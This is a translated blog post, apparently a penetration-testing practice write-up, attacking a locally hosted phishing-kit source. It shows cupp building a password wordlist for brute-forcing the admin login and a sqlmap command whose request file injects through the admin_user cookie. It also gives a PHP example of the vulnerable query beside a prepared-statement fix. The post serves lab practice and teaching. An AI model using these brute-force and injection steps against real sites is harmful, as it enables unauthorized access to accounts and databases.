Penetration Testing Series - Local #1 - Web Test - 2018 Phishing Site Source Code Test


The plan is to practise on four penetration-testing cases (two local + two real), working through the techniques and the detailed problems encountered both earlier and now, one by one.

Local #1: web test + internal network test
Local #2: web test, classic PoCs for 10-odd kinds of web vulnerabilities
Real #1: web test (medium-low)
Real #2: web + internal network test (fairly low)

This post reproduces the web test of Local #1, simulated with the source code of a 2018 phishing site.

The admin-panel login password was set to kongjian2018.

I. Admin panel has no captcha: brute force

1. cewl crawls the site and generates passwords (the copy bundled with kali could not be used because of a library dependency problem)

2. Using the cupp tool (for reference)

As you can see, it did not generate the correct password, but the result is still quite good.

root@kali:~/shentou# git clone https://github.com/Mebus/cupp.git
正克隆到 'cupp'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 194 (delta 1), reused 1 (delta 0), pack-reused 188
接收对象中: 100% (194/194), 109.18 KiB | 178.00 KiB/s, 完成.
处理 delta 中: 100% (100/100), 完成.
root@kali:~/shentou# cd cupp/
root@kali:~/shentou/cupp# ls
CHANGELOG.md cupp.cfg cupp.py LICENSE README.md test_cupp.py
root@kali:~/shentou/cupp# ./cupp.py -i
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: kong
> Surname: jian
> Nickname:
> Birthdate (DDMMYYYY): 19900902


> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):


> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):


> Pet's name:
> Company name:


> Do you want to add some key words about the victim? Y/[N]: n
> Do you want to add special chars at the end of words? Y/[N]: n
> Do you want to add some random numbers at the end of words? Y/[N]:n
> Leet mode? (i.e. leet = 1337) Y/[N]: y

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to kong.txt, counting 4960 words.
[+] Now load your pistolero with kong.txt and shoot! Good luck!

II. A look at the source code

1.

You can see that common.php includes 360's protection code (I did not find a way to bypass it here; last time I ran into a Safedog bypass, and if needed you can refer to my post on that: http://www.naivete.online/%e5%ae%89%e5%85%a8%e7%8b%97%e7%9a%84sql-fuzz/)

2.

Found member.php, which does not include 360waf.php; several cookie parameters are passed straight into the database query, so SQL injection exists.

Just run sqlmap -r 1.txt --batch --dbs --dbms=mysql --level=3 directly.

1.txt

POST /20190916/admin/login.php HTTP/1.1
Host: 192.168.142.129
Content-Length: 29
Cache-Control: max-age=0
Origin: http://192.168.142.129
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.142.129/20190916/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=af68khqaaji7drd6fpkkkr06d6;islogin=123;admin_user=*
Connection: close

user=admin&pass=admin&submit=
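An added illustration of the cookie-to-query pattern described above, written for this post and not taken from the phishing kit's actual member.php (whose code is not reproduced here): the vulnerable shape beside the prepared-statement version that keeps the admin_user cookie as data. The table name, column name and database credentials are assumed.

```php
<?php
// Added example, not the phishing kit's real member.php (its code is not on this page).
// Table "admin", column "username" and the connection credentials are assumed names.

// Vulnerable shape: the admin_user cookie is attacker-controlled and is pasted into the
// SQL string. With no 360waf.php include in front of it, a single quote in the cookie
// ends the string literal and whatever follows is parsed as SQL.
function find_admin_vulnerable(mysqli $db, string $cookie_user): ?array
{
    $sql = "SELECT id, username FROM admin WHERE username = '" . $cookie_user . "' LIMIT 1";
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened shape: a prepared statement binds the cookie value as a parameter, so it is
// always compared as data no matter which characters it contains. The WAF then becomes
// a second layer of defence instead of the only one.
function find_admin_safe(mysqli $db, string $cookie_user): ?array
{
    $stmt = $db->prepare("SELECT id, username FROM admin WHERE username = ? LIMIT 1");
    $stmt->bind_param('s', $cookie_user);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Call site: the value comes straight from the request's Cookie header, as in 1.txt above.
// Whether the visitor is logged in should likewise be decided from the server-side
// session ($_SESSION), not from a client-supplied cookie.
$db = new mysqli('127.0.0.1', 'dbuser', 'dbpass', 'phish');   // assumed credentials
$cookie_user = $_COOKIE['admin_user'] ?? '';
$admin = find_admin_safe($db, $cookie_user);
```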

3.

The painful part is that after the SQL injection there was nothing further to exploit: the few functional files that do not pass through 360waf only contain SQL functionality.

2019.9.16
